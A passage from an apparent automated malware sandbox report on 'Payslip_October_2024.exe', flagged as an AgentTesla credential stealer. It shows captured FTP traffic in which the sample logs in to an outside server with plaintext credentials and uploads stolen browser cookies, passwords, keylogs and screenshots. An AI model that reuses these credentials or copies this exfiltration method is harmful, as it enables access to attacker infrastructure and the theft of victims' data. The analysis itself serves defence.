                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Nov 4, 2024 21:24:58.149497032 CET4973521192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                          Nov 4, 2024 21:24:58.498543024 CET2149735110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                          Nov 4, 2024 21:24:58.498661041 CET4973521192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                          Nov 4, 2024 21:24:58.877778053 CET2149735110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Nov 4, 2024 21:24:59.228914022 CET2149735110.4.45.197192.168.2.4504 Unknown command
                                                                                                          Nov 4, 2024 21:24:59.229027987 CET4973521192.168.2.4110.4.45.197PWD
                                                                                                          Nov 4, 2024 21:24:59.579032898 CET2149735110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                          Nov 4, 2024 21:24:59.579164982 CET4973521192.168.2.4110.4.45.197TYPE I
                                                                                                          Nov 4, 2024 21:24:59.928574085 CET2149735110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Nov 4, 2024 21:24:59.928759098 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:00.277859926 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,192,87)
                                                                                                          Nov 4, 2024 21:25:00.285343885 CET4973521192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-724536_2024_11_04_15_44_56.txt
                                                                                                          Nov 4, 2024 21:25:01.185388088 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:01.533375978 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.348 seconds (measured here), 9.41 Kbytes per second
                                                                                                          Nov 4, 2024 21:25:01.533736944 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:01.884216070 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,249,245)
                                                                                                          Nov 4, 2024 21:25:01.889717102 CET4973521192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-724536_2024_11_04_21_53_28.txt
                                                                                                          Nov 4, 2024 21:25:02.811544895 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:03.163824081 CET2149735110.4.45.197192.168.2.4226 File successfully transferred
                                                                                                          Nov 4, 2024 21:25:11.196496010 CET2149741110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.220-This is a private system - No anonymous login
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Nov 4, 2024 21:25:11.206302881 CET4974121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                          Nov 4, 2024 21:25:11.551081896 CET2149741110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                          Nov 4, 2024 21:25:11.551650047 CET4974121192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                          Nov 4, 2024 21:25:11.926958084 CET2149741110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Nov 4, 2024 21:25:12.271320105 CET2149741110.4.45.197192.168.2.4504 Unknown command
                                                                                                          Nov 4, 2024 21:25:12.271470070 CET4974121192.168.2.4110.4.45.197PWD
                                                                                                          Nov 4, 2024 21:25:12.627825975 CET2149741110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                          Nov 4, 2024 21:25:12.628004074 CET4974121192.168.2.4110.4.45.197TYPE I
                                                                                                          Nov 4, 2024 21:25:12.971760988 CET2149741110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Nov 4, 2024 21:25:12.971892118 CET4974121192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:13.316006899 CET2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,203,242)
                                                                                                          Nov 4, 2024 21:25:13.322096109 CET4974121192.168.2.4110.4.45.197STOR PW_user-724536_2024_11_04_15_25_09.html
                                                                                                          Nov 4, 2024 21:25:14.233009100 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:14.812055111 CET2149741110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.346 seconds (measured here), 0.98 Kbytes per second
                                                                                                          Nov 4, 2024 21:25:14.813723087 CET2149741110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.346 seconds (measured here), 0.98 Kbytes per second
                                                                                                          Nov 4, 2024 21:25:15.089061975 CET4974121192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:15.433594942 CET2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,251,201)
                                                                                                          Nov 4, 2024 21:25:15.439353943 CET4974121192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-724536_2024_11_04_21_43_50.txt
                                                                                                          Nov 4, 2024 21:25:17.385520935 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:17.385582924 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:17.385813951 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:17.386035919 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:20.177556992 CET2149751110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.220-This is a private system - No anonymous login
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 04:25. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Nov 4, 2024 21:25:20.180557966 CET4975121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                          Nov 4, 2024 21:25:20.532474995 CET2149751110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                          Nov 4, 2024 21:25:20.536825895 CET4975121192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                          Nov 4, 2024 21:25:20.914602041 CET2149751110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Nov 4, 2024 21:25:21.268820047 CET2149751110.4.45.197192.168.2.4504 Unknown command
                                                                                                          Nov 4, 2024 21:25:21.269021988 CET4975121192.168.2.4110.4.45.197PWD
                                                                                                          Nov 4, 2024 21:25:21.639569998 CET2149751110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                          Nov 4, 2024 21:25:21.639883041 CET4975121192.168.2.4110.4.45.197TYPE I
                                                                                                          Nov 4, 2024 21:25:21.991764069 CET2149751110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Nov 4, 2024 21:25:21.992010117 CET4975121192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:22.344014883 CET2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,214,32)
                                                                                                          Nov 4, 2024 21:25:22.350302935 CET4975121192.168.2.4110.4.45.197STOR PW_user-724536_2024_11_04_15_25_18.html
                                                                                                          Nov 4, 2024 21:25:23.295093060 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:23.654500961 CET2149751110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.358 seconds (measured here), 0.95 Kbytes per second
                                                                                                          Nov 4, 2024 21:25:23.678637981 CET4975121192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:24.031280041 CET2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,232,48)
                                                                                                          Nov 4, 2024 21:25:24.037296057 CET4975121192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-724536_2024_11_04_22_03_52.txt
                                                                                                          Nov 4, 2024 21:25:24.978235006 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:25.331723928 CET2149751110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.357 seconds (measured here), 9.17 Kbytes per second
                                                                                                          Nov 4, 2024 21:25:25.332184076 CET4975121192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:25.686129093 CET2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,223,199)
                                                                                                          Nov 4, 2024 21:25:25.693078041 CET4975121192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-724536_2024_11_05_00_32_35.txt
                                                                                                          Nov 4, 2024 21:25:26.639322042 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:26.984440088 CET2149751110.4.45.197192.168.2.4226 File successfully transferred
                                                                                                          Nov 4, 2024 21:26:27.785145044 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:26:28.134579897 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,226,148)
                                                                                                          Nov 4, 2024 21:26:28.140477896 CET4973521192.168.2.4110.4.45.197STOR KL_user-724536_2024_11_18_19_04_53.html
                                                                                                          Nov 4, 2024 21:26:29.055278063 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:26:29.404416084 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.349 seconds (measured here), 0.80 Kbytes per second
                                                                                                          Nov 4, 2024 21:26:32.110491037 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:26:32.459836006 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,220,175)
                                                                                                          Nov 4, 2024 21:26:32.469227076 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_11_22_21_55_24.jpeg
                                                                                                          Nov 4, 2024 21:26:33.367384911 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:26:34.121799946 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.756 seconds (measured here), 97.69 Kbytes per second
                                                                                                          Nov 4, 2024 21:26:42.923118114 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:26:43.272464037 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,226,141)
                                                                                                          Nov 4, 2024 21:26:43.278801918 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_11_29_06_34_55.jpeg
                                                                                                          Nov 4, 2024 21:26:44.220077038 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:26:45.020203114 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.800 seconds (measured here), 92.29 Kbytes per second
                                                                                                          Nov 4, 2024 21:26:51.670495033 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:26:52.019615889 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,238,144)
                                                                                                          Nov 4, 2024 21:26:52.025342941 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_12_07_11_23_16.jpeg
                                                                                                          Nov 4, 2024 21:26:52.943694115 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:26:53.722090960 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.778 seconds (measured here), 94.93 Kbytes per second
                                                                                                          Nov 4, 2024 21:26:56.157516956 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:26:56.507267952 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,247,138)
                                                                                                          Nov 4, 2024 21:26:56.513139009 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_12_11_14_38_27.jpeg
                                                                                                          Nov 4, 2024 21:26:57.422035933 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:26:58.176453114 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.754 seconds (measured here), 97.91 Kbytes per second
                                                                                                          Nov 4, 2024 21:27:10.904073954 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:27:11.253354073 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,207,5)
                                                                                                          Nov 4, 2024 21:27:11.262636900 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_12_19_23_56_34.jpeg
                                                                                                          Nov 4, 2024 21:27:12.201129913 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:27:12.980257988 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.775 seconds (measured here), 95.34 Kbytes per second
                                                                                                          Nov 4, 2024 21:27:19.153726101 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:27:19.517566919 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,194,195)
                                                                                                          Nov 4, 2024 21:27:19.523673058 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_12_25_06_21_32.jpeg
                                                                                                          Nov 4, 2024 21:27:20.464711905 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:27:21.283404112 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.819 seconds (measured here), 90.20 Kbytes per second
                                                                                                          Nov 4, 2024 21:27:28.014493942 CET2150034110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 04:27. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 04:27. Server port: 21.220-This is a private system - No anonymous login
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 04:27. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 04:27. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Nov 4, 2024 21:27:28.014645100 CET5003421192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                          Nov 4, 2024 21:27:28.356697083 CET2150034110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                          Nov 4, 2024 21:27:28.362658978 CET5003421192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                          Nov 4, 2024 21:27:28.732450962 CET2150034110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Nov 4, 2024 21:27:29.074615955 CET2150034110.4.45.197192.168.2.4504 Unknown command
                                                                                                          Nov 4, 2024 21:27:29.076683044 CET5003421192.168.2.4110.4.45.197PWD
                                                                                                          Nov 4, 2024 21:27:29.416821957 CET2150034110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                          Nov 4, 2024 21:27:29.416964054 CET5003421192.168.2.4110.4.45.197TYPE I
                                                                                                          Nov 4, 2024 21:27:29.757000923 CET2150034110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Nov 4, 2024 21:27:29.757158041 CET5003421192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:27:30.097412109 CET2150034110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,212,215)
                                                                                                          Nov 4, 2024 21:27:30.108757973 CET5003421192.168.2.4110.4.45.197STOR SC_user-724536_2024_12_10_16_48_19.jpeg
                                                                                                          Nov 4, 2024 21:27:31.024893999 CET2150034110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:27:31.807467937 CET2150034110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.783 seconds (measured here), 94.35 Kbytes per second
                                                                                                          Nov 4, 2024 21:27:42.158437014 CET5003421192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:27:42.503351927 CET2150034110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,200,71)
                                                                                                          Nov 4, 2024 21:27:42.509063005 CET5003421192.168.2.4110.4.45.197STOR SC_user-724536_2024_12_19_02_29_30.jpeg
                                                                                                          Nov 4, 2024 21:27:43.494218111 CET2150034110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:27:43.695734978 CET2150034110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:27:44.300317049 CET2150034110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.843 seconds (measured here), 87.61 Kbytes per second
                                                                                                          Nov 4, 2024 21:27:46.045569897 CET5003421192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:27:46.385701895 CET2150034110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,244,4)
                                                                                                          Nov 4, 2024 21:27:46.391652107 CET5003421192.168.2.4110.4.45.197STOR SC_user-724536_2024_12_24_02_40_35.jpeg
                                                                                                          Nov 4, 2024 21:27:47.339618921 CET2150034110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:27:59.079837084 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:27:59.428966045 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,236,95)
                                                                                                          Nov 4, 2024 21:27:59.438764095 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_16_09_38_03.jpeg
                                                                                                          Nov 4, 2024 21:28:00.356689930 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:01.145380974 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.788 seconds (measured here), 93.72 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:05.200150967 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:05.549232960 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,232,224)
                                                                                                          Nov 4, 2024 21:28:05.558703899 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_20_22_44_01.jpeg
                                                                                                          Nov 4, 2024 21:28:06.484287024 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:07.280531883 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.797 seconds (measured here), 92.66 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:18.235924006 CET2150040110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 04:28. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 04:28. Server port: 21.220-This is a private system - No anonymous login
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 04:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 04:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Nov 4, 2024 21:28:18.236058950 CET5004021192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                          Nov 4, 2024 21:28:18.579554081 CET2150040110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                          Nov 4, 2024 21:28:18.579694033 CET5004021192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                          Nov 4, 2024 21:28:18.950798035 CET2150040110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Nov 4, 2024 21:28:19.295345068 CET2150040110.4.45.197192.168.2.4504 Unknown command
                                                                                                          Nov 4, 2024 21:28:19.295480967 CET5004021192.168.2.4110.4.45.197PWD
                                                                                                          Nov 4, 2024 21:28:19.654599905 CET2150040110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                          Nov 4, 2024 21:28:19.654776096 CET5004021192.168.2.4110.4.45.197TYPE I
                                                                                                          Nov 4, 2024 21:28:19.997891903 CET2150040110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Nov 4, 2024 21:28:19.998037100 CET5004021192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:20.341048002 CET2150040110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,254,4)
                                                                                                          Nov 4, 2024 21:28:20.347642899 CET5004021192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_07_03_20_08.jpeg
                                                                                                          Nov 4, 2024 21:28:21.256980896 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:21.468003035 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:22.018806934 CET2150040110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.762 seconds (measured here), 96.90 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:22.275010109 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:22.654452085 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,231,20)
                                                                                                          Nov 4, 2024 21:28:22.660265923 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_29_19_06_07.jpeg
                                                                                                          Nov 4, 2024 21:28:23.579749107 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:24.379509926 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.800 seconds (measured here), 97.63 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:37.753177881 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:38.102790117 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,220,53)
                                                                                                          Nov 4, 2024 21:28:38.108731985 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_02_10_03_11_38.jpeg
                                                                                                          Nov 4, 2024 21:28:39.042651892 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:39.863949060 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.815 seconds (measured here), 90.63 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:46.652870893 CET5004021192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:47.001415968 CET2150040110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,196,195)
                                                                                                          Nov 4, 2024 21:28:47.007858992 CET5004021192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_27_06_09_57.jpeg
                                                                                                          Nov 4, 2024 21:28:47.921161890 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:48.665375948 CET2150040110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.744 seconds (measured here), 99.27 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:50.512969017 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:50.862457037 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,233,168)
                                                                                                          Nov 4, 2024 21:28:50.869215965 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_02_17_03_34_59.jpeg
                                                                                                          Nov 4, 2024 21:28:51.800158978 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:52.232244968 CET5004021192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:52.571675062 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.772 seconds (measured here), 95.71 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:52.577948093 CET2150040110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,235,203)
                                                                                                          Nov 4, 2024 21:28:52.588850021 CET5004021192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_31_17_17_46.jpeg
                                                                                                          Nov 4, 2024 21:28:53.481708050 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:54.331672907 CET2150040110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.751 seconds (measured here), 98.36 Kbytes per second
                                                                                                          Nov 4, 2024 21:29:03.609679937 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:29:03.959089041 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,235,230)
                                                                                                          Nov 4, 2024 21:29:03.964960098 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_11_04_15_29_02.jpeg
                                                                                                          Nov 4, 2024 21:29:04.867230892 CET2149735110.4.45.197192.168.2.4150 Accepted data connection

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:15:24:51
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Payslip_October_2024.exe"
                                                                                                          Imagebase:0xa30000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:15:24:54
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          Wow64 process (32bit):true
